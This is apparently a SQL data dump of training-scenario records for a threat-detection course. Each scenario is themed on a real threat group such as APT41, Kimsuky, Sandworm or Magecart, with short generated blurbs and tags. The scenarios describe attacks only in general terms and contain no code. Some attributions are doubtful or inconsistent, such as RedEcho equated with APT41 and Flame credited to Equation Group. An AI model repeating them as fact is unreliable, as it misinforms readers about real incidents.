(20, 'Operation Whitefly', 'Whitefly (Singapore-based?)', 'Investigate Whitefly APT\'s breach using Vcrodat malware in the healthcare sector, focusing on persistence and compromised open-source tools.', 'In this advanced scenario, analysts are tasked with investigating a sophisticated breach within the healthcare and materials science sectors. The notorious Whitefly APT group has employed their custom Vcrodat malware to maintain persistence while cleverly blending their malicious activities with legitimate developer behaviors by compromising open-source tools. Participants will need to piece together clues from multiple alerts to unravel the attackers\' tactics, techniques, and procedures.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Whitefly APT\\\\\\\",\\\\\\\"Vcrodat malware\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"healthcare breach\\\\\\\",\\\\\\\"open-source compromise\\\\\\\"]\\\"\"', '', 7, '2026-01-04 02:14:54', 'Advanced Breach Investigation: Whitefly APT in Healthcare', 'Investigate Whitefly APT\'s breach using Vcrodat malware in the healthcare sector, focusing on persistence and compromised open-source tools.', 'operation-whitefly', 1),
(21, 'Operation Silent Shield', 'Kimsuky (Velvet Chollima)', 'Explore Kimsuky\'s use of malicious browser extensions and BabyShark malware in a targeted spear-phishing campaign.', 'In a rapidly evolving cyber landscape, the global think tank specializing in nuclear policy finds itself under siege. The notorious APT group Kimsuky, known for its advanced tactics, has launched a spear-phishing campaign employing malicious browser extensions and the insidious BabyShark malware. As a beginner analyst, your mission is to unravel the layers of this attack, tracing each step from initial access to data exfiltration, and fortifying defenses against future threats.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Kimsuky APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"spear-phishing\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"BabyShark malware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"nuclear policy\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 02:18:07', 'Kimsuky Spear-Phishing Tactics Against Nuclear Policy Think Tanks', 'Explore Kimsuky\'s use of malicious browser extensions and BabyShark malware in a targeted spear-phishing campaign.', 'operation-silent-shield', 1),
(22, 'Operation Double Dragon', 'APT41 (Double Dragon)', 'Investigate APT41\'s dual-mode operation targeting gaming source code and PII for espionage.', 'In this advanced training scenario, participants will track APT41, a notorious cyber threat actor known for conducting both state-sponsored espionage and financially-motivated attacks. The operation begins with the theft of strategic game source code for profit and pivots to a more sinister goal: accessing databases containing citizens\' PII. As they unravel this complex operation, participants will navigate through sophisticated supply chain attacks and lateral movements emblematic of APT41\'s tactics, techniques, and procedures.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"APT41\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cyber Espionage\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Gaming Industry\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Supply Chain Attack\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"PII Theft\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 02:21:13', 'APT41: Dual-Mode Cyber Operation Training', 'Investigate APT41\'s dual-mode operation targeting gaming source code and PII for espionage.', 'operation-double-dragon', 1),
(23, 'Operation Red Echo', 'APT41 / RedEcho', 'Engage with APT41 tactics in Operation Red Echo, a realistic cyber defense scenario for intermediate analysts.', 'In this immersive training scenario, participants are tasked with defending a fictional telecom company under siege by the notorious APT41, known as RedEcho. This advanced persistent threat group, originating from China, has launched a multi-vector attack, leveraging their expertise in supply chain compromises and ransomware to infiltrate the company\'s network. Your mission is to detect, analyze, and mitigate the threats as they unfold in a five-step attack sequence. Can you thwart RedEcho\'s espionage and financial motives before critical data is exfiltrated?', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"APT41\\\\\\\",\\\\\\\"RedEcho\\\\\\\",\\\\\\\"Cyber Defense Training\\\\\\\",\\\\\\\"Intermediate Cybersecurity\\\\\\\",\\\\\\\"Supply Chain Attack\\\\\\\"]\\\"\"', '', 5, '2026-01-04 04:11:04', 'Operation Red Echo: Intermediate Cyber Defense Training', 'Engage with APT41 tactics in Operation Red Echo, a realistic cyber defense scenario for intermediate analysts.', 'operation-red-echo', 1),
(24, 'Operation Pipeline Shut', 'DarkSide', 'Learn to defend against DarkSide with this beginner operation: Pipeline Shut, designed for cybersecurity training.', 'In the wake of increasing cyber threats, DarkSide has targeted a major energy pipeline. As part of the security team, you must identify and mitigate their efforts. This operation will take you through the critical stages of an attack, from initial access to data exfiltration.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"DarkSide\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"pipeline security\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"beginner threat detection\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 04:13:17', 'Operation Pipeline Shut: Training Scenario Against DarkSide', 'Learn to defend against DarkSide with this beginner operation: Pipeline Shut, designed for cybersecurity training.', 'operation-pipeline-shut', 1),
(25, 'Operation Kinetic Strike', 'REvil (Sodinokibi)', 'Intermediate cybersecurity operation simulating REvil\'s tactics for effective threat response training.', 'In the wake of escalating ransomware attacks, Operation Kinetic Strike challenges your cybersecurity team to defend against REvil, a notorious APT group. Your mission is to detect and mitigate their attack as they compromise a fictional corporation\'s network. Stay vigilant as REvil employs sophisticated techniques in a bid to encrypt sensitive data and demand a hefty ransom.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"REvil Ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity Training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT Group Simulation\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Threat Detection\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Ransomware Defense\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 04:24:42', 'Operation Kinetic Strike: REvil Ransomware Simulation', 'Intermediate cybersecurity operation simulating REvil\'s tactics for effective threat response training.', 'operation-kinetic-strike', 1),
(26, 'Operation File Transfer', 'Cl0p (TA505)', 'Engage in an advanced simulation against Cl0p (TA505), focusing on their sophisticated file transfer tactics.', 'In the midst of a bustling financial quarter, your organization receives a tip-off about Cl0p (TA505) targeting your infrastructure. This notorious APT group is known for their adeptness in exploiting network vulnerabilities for massive data exfiltration. As part of the cybersecurity team, you must thwart their Operation File Transfer before critical data falls into the wrong hands.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Cl0p APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"advanced threat simulation\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"file transfer security\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 04:37:17', 'Operation File Transfer: Cl0p\'s Advanced Tactics', 'Engage in an advanced simulation against Cl0p (TA505), focusing on their sophisticated file transfer tactics.', 'operation-file-transfer', 1),
(27, 'Operation Midnight Storm', 'Nobelium (Midnight Blizzard)', 'Train on detecting and mitigating Nobelium\'s cloud-based identity attacks targeting diplomatic entities.', 'In a world of escalating cyber threats, a new wave of attacks has emerged, targeting diplomatic entities through sophisticated cloud identity compromises. Nobelium, the notorious APT group linked to Russia\'s SVR, has launched a campaign using advanced techniques like password spraying and token theft to bypass MFA. Your mission is to investigate these breaches, uncover rogue OAuth applications, and secure the compromised systems.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Nobelium\\\",\\\"cloud security\\\",\\\"identity compromise\\\",\\\"APT29\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-04 23:54:35', 'Nobelium Cloud Identity Compromise Simulation', 'Train on detecting and mitigating Nobelium\'s cloud-based identity attacks targeting diplomatic entities.', 'operation-midnight-storm', 1),
(28, 'Operation Volt Strike', 'Volt Typhoon', 'Train to detect Volt Typhoon\'s stealthy living off the land tactics using built-in Windows tools in critical infrastructure.', 'In the world of cyber espionage, stealth is paramount. Volt Typhoon, a notorious APT group, has launched a covert operation targeting critical infrastructure sectors. Their modus operandi: blending in with legitimate administrative activity using only native Windows tools. As a cybersecurity analyst, your mission is to uncover this clandestine campaign, piecing together subtle clues that reveal their presence. Can you follow the trail and mitigate the threat before it\'s too late?', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Volt Typhoon\\\",\\\"cybersecurity training\\\",\\\"LOLBins\\\",\\\"critical infrastructure\\\",\\\"advanced threat detection\\\"]\"', '', 5, '2026-01-04 23:56:24', 'Advanced Detection of LOLBins in Critical Infrastructure by Volt Typhoon', 'Train to detect Volt Typhoon\'s stealthy living off the land tactics using built-in Windows tools in critical infrastructure.', 'operation-volt-strike', 1),
(29, 'Operation Charming Charter', 'Charming Kitten (Phosphorus)', 'Analyze Charming Kitten\'s social engineering campaign targeting journalists via WhatsApp and email using DownPaper backdoor.', 'In recent months, the notorious APT group Charming Kitten has intensified its operations, targeting journalists and human rights activists. Using social engineering tactics via WhatsApp and email, they aim to infiltrate networks and extract sensitive information. This operation focuses on analyzing the DownPaper backdoor and the credential harvesting tactics disguised as legitimate interview requests.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Charming Kitten\\\\\\\",\\\\\\\"social engineering\\\\\\\",\\\\\\\"DownPaper\\\\\\\",\\\\\\\"credential harvesting\\\\\\\"]\\\"\"', '', 5, '2026-01-04 23:58:37', 'Charming Kitten Social Engineering and DownPaper Analysis', 'Analyze Charming Kitten\'s social engineering campaign targeting journalists via WhatsApp and email using DownPaper backdoor.', 'operation-charming-charter', 1),
(30, 'Operation Fox Hunt', 'Fox Kitten', 'Experience Fox Kitten\'s APT exploitation of VPN concentrators to infiltrate and compromise domain controllers.', 'In this scenario, the notorious Fox Kitten APT group targets unpatched VPN concentrators, swiftly penetrating corporate networks. Once inside, they rapidly deploy web shells and move laterally to compromise the domain controller, dumping critical credentials and paving the way for further exploitation. Participants must identify and neutralize the threat to protect sensitive enterprise environments.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Fox Kitten\\\\\\\",\\\\\\\"VPN Exploit\\\\\\\",\\\\\\\"Domain Controller\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\",\\\\\\\"APT\\\\\\\"]\\\"\"', '', 7, '2026-01-05 00:00:59', 'Fox Kitten\'s VPN Exploit and Domain Controller Breach', 'Experience Fox Kitten\'s APT exploitation of VPN concentrators to infiltrate and compromise domain controllers.', 'operation-fox-hunt', 1),
(33, 'Operation Swipe Left', 'FIN6', 'Investigate a breach by FIN6 using Trinity malware to scrape credit card data from a retail giant\'s POS network.', 'In this intermediate-level training scenario, participants will dive into a high-stakes breach investigation involving the notorious cybercrime group FIN6. The group has infiltrated a leading retail company\'s Point-of-Sale (POS) network using compromised vendor credentials. Their goal? To deploy the insidious \'Trinity\' malware, designed to scrape sensitive credit card data directly from RAM before it can be encrypted. As the investigation unfolds, you must trace their steps through the network, piece together the attack sequence, and mitigate the damage.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"FIN6\\\",\\\"Trinity malware\\\",\\\"POS network breach\\\",\\\"cybersecurity training\\\",\\\"credit card data\\\"]\"', '', 5, '2026-01-05 00:09:23', 'FIN6 Breach Simulation: Uncovering Trinity Malware in Retail POS Network', 'Investigate a breach by FIN6 using Trinity malware to scrape credit card data from a retail giant\'s POS network.', 'operation-swipe-left', 1),
(32, 'Operation Cart Skimmer', 'Magecart (Group 12)', 'Experience an intermediate-level Magecart attack scenario with digital skimming and data exfiltration analysis.', 'In this scenario, participants are tasked with analyzing a sophisticated digital skimming attack orchestrated by Magecart Group 12. The attack targets the checkout pages of numerous online stores through a compromised third-party advertising library. Participants will uncover obfuscated JavaScript code and trace the exfiltrated data to an external drop server, simulating real-world cybersecurity challenges.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Magecart\\\",\\\"digital skimming\\\",\\\"cybersecurity training\\\",\\\"JavaScript analysis\\\",\\\"data exfiltration\\\"]\"', '', 3, '2026-01-05 00:06:31', 'Magecart Digital Skimming Attack Simulation', 'Experience an intermediate-level Magecart attack scenario with digital skimming and data exfiltration analysis.', 'operation-cart-skimmer', 1),
(34, 'Operation Primitive Bear', 'Gamaredon (Shuckworm)', 'Simulate a Gamaredon cyber-espionage campaign targeting military personnel with weaponized Word documents and VBScript backdoors.', 'In this training scenario, participants will navigate a simulated cyber-espionage campaign orchestrated by the notorious APT group, Gamaredon, also known as Shuckworm. The operation centers around a high-volume attack targeting military personnel using weaponized Word documents. Trainees will delve into how these documents leverage template injection techniques and incorporate custom VBScript backdoors to facilitate rapid data theft. This exercise will enhance understanding of how such threats manifest in real-world scenarios and prepare analysts to identify and mitigate similar threats.', 'beginner', 0, 1, 0, 60, NULL, '\"[\\\"Gamaredon\\\",\\\"cyber-espionage\\\",\\\"Word document injection\\\",\\\"VBScript backdoor\\\",\\\"military cybersecurity\\\"]\"', '', 3, '2026-01-05 02:58:53', 'Gamaredon Espionage Simulation: Weaponized Word Docs & VBScript Backdoors', 'Simulate a Gamaredon cyber-espionage campaign targeting military personnel with weaponized Word documents and VBScript backdoors.', 'operation-primitive-bear', 1),
(35, 'Operation Energy Bear', 'Dragonfly (Energetic Bear)', 'Simulate Dragonfly\'s strategic intrusion in the energy sector using trojanized ICS software updates.', 'In this scenario, the notorious Dragonfly APT group, also known as Energetic Bear, targets the energy sector by infiltrating the supply chain. The attackers have trojanized legitimate software updates for industrial control systems (ICS) equipment. This operation will train participants to identify the \'Havex\' RAT and trace the network reconnaissance activities within an industrial control network, enhancing their skills in defending critical infrastructure.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Dragonfly APT\\\\\\\",\\\\\\\"ICS security\\\\\\\",\\\\\\\"Havex RAT\\\\\\\",\\\\\\\"cyber threat intelligence\\\\\\\",\\\\\\\"supply chain attack\\\\\\\"]\\\"\"', '', 5, '2026-01-05 03:01:44', 'Dragonfly\'s ICS Supply Chain Attack Simulation', 'Simulate Dragonfly\'s strategic intrusion in the energy sector using trojanized ICS software updates.', 'operation-energy-bear', 1),
(36, 'Operation Hotel Guest', 'DarkHotel', 'Advanced scenario: DarkHotel targets luxury hotel executives via Wi-Fi, delivering Tapaoux malware disguised as updates.', 'In a high-stakes cyber operation, the notorious APT group DarkHotel has launched a precision spear-phishing campaign targeting executives staying at luxury hotels. Leveraging the hotel\'s Wi-Fi network, they deliver sophisticated, signed malware disguised as software updates. Trainees will analyze the Tapaoux malware and investigate certificate spoofing tactics used by the attackers to compromise their high-profile targets.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"DarkHotel\\\\\\\",\\\\\\\"spear-phishing\\\\\\\",\\\\\\\"Tapaoux malware\\\\\\\",\\\\\\\"certificate spoofing\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\"]\\\"\"', '', 5, '2026-01-05 03:03:57', 'DarkHotel Spear-Phishing Attack on Luxury Hotel Executives', 'Advanced scenario: DarkHotel targets luxury hotel executives via Wi-Fi, delivering Tapaoux malware disguised as updates.', 'operation-hotel-guest', 1),
(37, 'Operation Sea Lotus', 'Naikon', 'Investigate Naikon\'s espionage using RoyalRoad and Aria-body in a South China Sea cyber operation.', 'In the geopolitical hotspot of the South China Sea, a sophisticated threat actor, Naikon, has launched a stealthy cyber espionage campaign. Using the RoyalRoad RTF weaponizer, they deliver the Aria-body backdoor, gaining access to sensitive information. This operation requires you to meticulously analyze alerts, trace the attack path, and uncover the command and control infrastructure disguised as legitimate government domains. Your mission is to dismantle this campaign and safeguard regional cybersecurity.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Naikon APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"RoyalRoad exploit\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Aria-body backdoor\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Espionage campaign\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity training\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-05 03:07:33', 'South China Sea Espionage: Uncovering Naikon\'s RoyalRoad Exploit', 'Investigate Naikon\'s espionage using RoyalRoad and Aria-body in a South China Sea cyber operation.', 'operation-sea-lotus', 1),
(39, 'Operation Ghost Writer', 'UNC1151', 'Train on UNC1151\'s tactics in hacking news sites to spread misinformation, from CMS breaches to social media manipulation.', 'In this training scenario, participants will dive into the world of cyber-influence operations orchestrated by UNC1151. This APT group has targeted popular news websites, compromising their CMS accounts to publish false narratives. As the fabricated stories spread, a coordinated effort on social media amplifies the misinformation, challenging trainees to trace the attack and mitigate its impact.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"UNC1151\\\",\\\"cyber-influence\\\",\\\"APT training\\\",\\\"media manipulation\\\",\\\"CMS hacking\\\"]\"', '', 5, '2026-01-05 03:21:54', 'UNC1151\'s Media Manipulation: A Cyber-Influence Training Scenario', 'Train on UNC1151\'s tactics in hacking news sites to spread misinformation, from CMS breaches to social media manipulation.', 'operation-ghost-writer', 1),
(40, 'Operation Wicked Game', 'APT41 (Wicked Panda)', 'Experience an advanced simulation of APT41\'s supply chain attack on the gaming industry, featuring the ShadowPad payload.', 'In this high-stakes training scenario, participants will delve into a sophisticated supply chain attack orchestrated by APT41, a notorious cyber threat group from China. The operation focuses on the gaming industry, where attackers have infiltrated the build environment of a popular game to inject a malicious backdoor, known as ShadowPad, into the game\'s executable. This backdoor is then distributed to millions of unsuspecting players, setting the stage for a widespread cybersecurity breach. Trainees must navigate through a series of alerts to uncover the full scope of the attack and neutralize the threat.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Supply Chain Attack\\\",\\\"APT41\\\",\\\"ShadowPad\\\",\\\"Cybersecurity Training\\\",\\\"Gaming Industry\\\"]\"', '', 5, '2026-01-05 03:25:53', 'Advanced Supply Chain Attack Simulation with APT41', 'Experience an advanced simulation of APT41\'s supply chain attack on the gaming industry, featuring the ShadowPad payload.', 'operation-wicked-game', 1),
(41, 'Operation Heavy Anchor', 'Lazarus (Andariel)', 'Advanced training scenario exploring Lazarus Group\'s cyber-attack on South Korean defense firms to steal sensitive tank and laser weapon designs.', 'In a high-stakes cyber espionage campaign, the notorious Lazarus Group, specifically its Andariel sub-group, has set its sights on the South Korean defense industrial base. Their objective: to infiltrate and exfiltrate sensitive schematics of cutting-edge tank and laser weaponry. Utilizing their signature DTrack malware, the attackers employ a sophisticated kill chain to breach defenses, maintain persistence, and ultimately achieve their goal of intelligence theft.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"DTrack malware\\\\\\\",\\\\\\\"cyber espionage\\\\\\\",\\\\\\\"defense industrial base\\\\\\\",\\\\\\\"APT\\\\\\\"]\\\"\"', '', 5, '2026-01-05 04:00:31', 'Operation Stealth Blueprint: Lazarus Group Targeting Defense Secrets', 'Advanced training scenario exploring Lazarus Group\'s cyber-attack on South Korean defense firms to steal sensitive tank and laser weapon designs.', 'operation-heavy-anchor', 1),
(42, 'Operation Kitty Corner', 'CopyKittens', 'Train to counter CopyKittens\' Matryoshka RAT targeting foreign affairs via DNS tunneling.', 'In this scenario, participants will engage in a simulated espionage campaign orchestrated by the notorious APT group, CopyKittens. The group has set its sights on Ministries of Foreign Affairs, deploying their infamous \'Matryoshka\' RAT to infiltrate and exfiltrate sensitive governmental documents. Participants must decode encrypted DNS traffic to thwart the attackers and secure critical intelligence.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"CopyKittens\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Matryoshka RAT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"DNS tunneling\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"espionage\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-05 04:02:16', 'Operation Matryoshka: CopyKittens Espionage Drill', 'Train to counter CopyKittens\' Matryoshka RAT targeting foreign affairs via DNS tunneling.', 'operation-kitty-corner', 1),
(43, 'Operation Rocket Man', 'Rocket Kitten', 'Simulate and analyze Rocket Kitten\'s tactics targeting aerospace firms using \'Gholee\' malware and fake personas.', 'In a world where every byte of data can shape destinies, Rocket Kitten, a notorious APT group, sets its sights on the aerospace industry. Utilizing their infamous \'Gholee\' malware and deceptive social engineering via fake Facebook profiles, they embark on a mission to infiltrate, persist, and exfiltrate critical data. Trainees, prepare to navigate through a web of deceit and cybersecurity challenges.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Rocket Kitten\\\",\\\"Gholee malware\\\",\\\"cybersecurity training\\\",\\\"APT simulation\\\",\\\"aerospace security\\\"]\"', '', 6, '2026-01-06 01:22:55', 'Rocket Kitten\'s Aerospace Intrusion Simulation', 'Simulate and analyze Rocket Kitten\'s tactics targeting aerospace firms using \'Gholee\' malware and fake personas.', 'operation-rocket-man', 1),
(44, 'Operation Jolly Roger', 'Lazarus (WannaCry)', 'Engage in an advanced cybersecurity scenario analyzing the SMB propagation of WannaCry via EternalBlue.', 'In May 2017, the world witnessed a massive ransomware outbreak known as WannaCry, orchestrated by the notorious Lazarus APT group. Exploiting the EternalBlue vulnerability in Microsoft SMB protocol, the ransomware spread rapidly, causing widespread panic and disruption. As a senior cyber threat intelligence analyst, your mission is to dissect this attack, understanding its propagation mechanics, identifying potential kill-switch domains, and determining if decryption is possible without succumbing to ransom demands.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"WannaCry\\\\\\\",\\\\\\\"EternalBlue\\\\\\\",\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"Ransomware\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\"]\\\"\"', '', 8, '2026-01-06 01:32:21', 'Global Ransomware Outbreak Simulation: Analyzing EternalBlue and WannaCry', 'Engage in an advanced cybersecurity scenario analyzing the SMB propagation of WannaCry via EternalBlue.', 'operation-jolly-roger', 1),
(45, 'Operation Blackout', 'Sandworm (NotPetya)', 'Train to identify Sandworm\'s wiper attack masquerading as ransomware via compromised software updates.', 'In this beginner-level training scenario, you\'ll confront a cyber attack orchestrated by the notorious Sandworm group. Disguised as ransomware, the attack spreads through a compromised update of an accounting software, aiming to destroy data and disrupt operations. Participants will learn to identify the master boot record (MBR) overwriting behavior and the use of Mimikatz to harvest credentials, facilitating rapid lateral movement across networks.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sandworm\\\\\\\",\\\\\\\"wiper attack\\\\\\\",\\\\\\\"NotPetya\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"ransomware disguise\\\\\\\"]\\\"\"', '', 5, '2026-01-06 01:35:52', 'Sandworm\'s Ransomware Disguise: MBR Wiper Attack', 'Train to identify Sandworm\'s wiper attack masquerading as ransomware via compromised software updates.', 'operation-blackout', 1),
(46, 'Operation Bad Rabbit', 'Callisto Group? (Unattributed)', 'Investigate Callisto Group\'s ransomware drive-by download attack using fake Adobe Flash updates and analyze the DiskCryptor ransomware code.', 'In a rapidly evolving digital landscape, the Callisto Group has launched a sophisticated ransomware campaign. Utilizing compromised news sites as a vector, unsuspecting users are lured into downloading fake Adobe Flash updates. Once executed, the payload encrypts the victim\'s hard drive using DiskCryptor and propagates through networks via SMB, demanding a hefty ransom. This scenario will take participants through a realistic threat investigation to dissect the attack\'s stages.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"drive-by download\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"DiskCryptor\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-06 01:38:27', 'Analyzing Callisto Group\'s Ransomware via Fake Adobe Updates', 'Investigate Callisto Group\'s ransomware drive-by download attack using fake Adobe Flash updates and analyze the DiskCryptor ransomware code.', 'operation-bad-rabbit', 1),
(47, 'Operation False Flag', 'Sandworm (Olympic Destroyer)', 'Investigate a Sandworm cyberattack disrupting a major sporting event, uncovering false flags and true attribution.', 'As the world gathers to witness the grandeur of a major sporting event\'s opening ceremony, chaos ensues as an unexpected cyberattack disrupts the celebration. The attack, attributed to the notorious Sandworm group, carries false flags pointing towards other nations. Participants will deconstruct the malware to trace its true origins, drawing parallels to Sandworm\'s previous operations. This exercise will test your skills in attribution and understanding of advanced persistent threats.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sandworm\\\\\\\",\\\\\\\"Olympic Destroyer\\\\\\\",\\\\\\\"cyberattack\\\\\\\",\\\\\\\"malware analysis\\\\\\\",\\\\\\\"APT Group\\\\\\\"]\\\"\"', '', 5, '2026-01-06 01:43:17', 'Sandworm Cyberattack: Unveiling the Olympic Ceremony Disruption', 'Investigate a Sandworm cyberattack disrupting a major sporting event, uncovering false flags and true attribution.', 'operation-false-flag', 1),
(48, 'Operation Shadow Hammer', 'Barium (Winnti)', 'Investigate a sophisticated supply chain attack that compromised the ASUS Live Update utility, targeting specific MAC addresses.', 'In an unprecedented cyber offensive, APT41, also known as Barium, launched a surgical strike within a mass infection by compromising the ASUS Live Update utility. This operation, dubbed \'Shadow Strike\', saw the deployment of malware targeting specific MAC addresses, revealing a calculated and highly selective attack amidst a sea of potential victims. Trainees must navigate through this complex landscape to uncover the true objectives and mitigate the threats posed by this advanced persistent threat group.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Supply Chain Attack\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT41\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"ASUS Live Update\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity Training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Barium\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 8, '2026-01-06 02:34:49', 'Operation Shadow Strike: The ASUS Supply Chain Breach', 'Investigate a sophisticated supply chain attack that compromised the ASUS Live Update utility, targeting specific MAC addresses.', 'operation-shadow-hammer', 1),
(49, 'Operation Cloud Atlas', 'Inception', 'Train on detecting Inception APT\'s Cloud Atlas malware targeting Eastern European diplomats.', 'In the heart of Eastern Europe, diplomatic entities face a sophisticated threat. The Inception APT group, known for its high-level espionage capabilities, launches a campaign using the elusive Cloud Atlas malware. Leveraging popular cloud storage services, they aim to infiltrate and extract sensitive information while evading detection. As a cybersecurity analyst, you are tasked with unraveling their tactics and protecting critical diplomatic communications.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"cybersecurity training\\\",\\\"APT Inception\\\",\\\"Cloud Atlas malware\\\",\\\"espionage campaign\\\",\\\"Eastern Europe\\\"]\"', '', 3, '2026-01-07 22:28:11', 'Inception APT: Espionage in Eastern Europe', 'Train on detecting Inception APT\'s Cloud Atlas malware targeting Eastern European diplomats.', 'operation-cloud-atlas', 1),
(50, 'Operation Red October', 'Rocra', 'Analyze Rocra\'s malware in a cyber-espionage campaign targeting diplomatic and research sectors.', 'In the shadows of international diplomacy and scientific innovation, a silent threat emerges. Rocra, an advanced persistent threat group, launches a massive cyber-espionage campaign targeting diplomatic, governmental, and scientific research organizations. The objective: to pilfer sensitive, encrypted information and recover deleted data from unsuspecting victims\' USB drives. Trainees must navigate this intricate operation, uncover the Rocra malware framework, and counteract its espionage tactics.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Rocra\\\",\\\"cyber-espionage\\\",\\\"APT\\\",\\\"malware analysis\\\",\\\"data exfiltration\\\"]\"', '', 5, '2026-01-07 22:28:37', 'Operation Red October: Unveiling Rocra\'s Cyber-Espionage Tactics', 'Analyze Rocra\'s malware in a cyber-espionage campaign targeting diplomatic and research sectors.', 'operation-red-october', 1),
(51, 'Operation Flame', 'Equation Group', 'Analyze Equation Group\'s sophisticated malware in the Middle East using MD5 collisions and espionage modules.', 'In the dimly lit corridors of cyberspace, the Equation Group has unleashed a sophisticated malware platform targeting Middle Eastern entities. This scenario requires you to dissect intricate modules for audio recording, Bluetooth sniffing, and screen capture, while unraveling the mystery of MD5 collision attacks used to sign their malware. As tensions rise, your mission is to trace the attackers\' steps, analyze their tactics, and neutralize the threat before critical data is exfiltrated.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Equation Group\\\\\\\",\\\\\\\"cyber-espionage\\\\\\\",\\\\\\\"malware analysis\\\\\\\",\\\\\\\"MD5 collision\\\\\\\",\\\\\\\"Middle East\\\\\\\"]\\\"\"', '', 5, '2026-01-07 22:31:17', 'Unraveling Equation Group\'s Espionage: A Deep Dive into Advanced Malware Tactics', 'Analyze Equation Group\'s sophisticated malware in the Middle East using MD5 collisions and espionage modules.', 'operation-flame', 1);
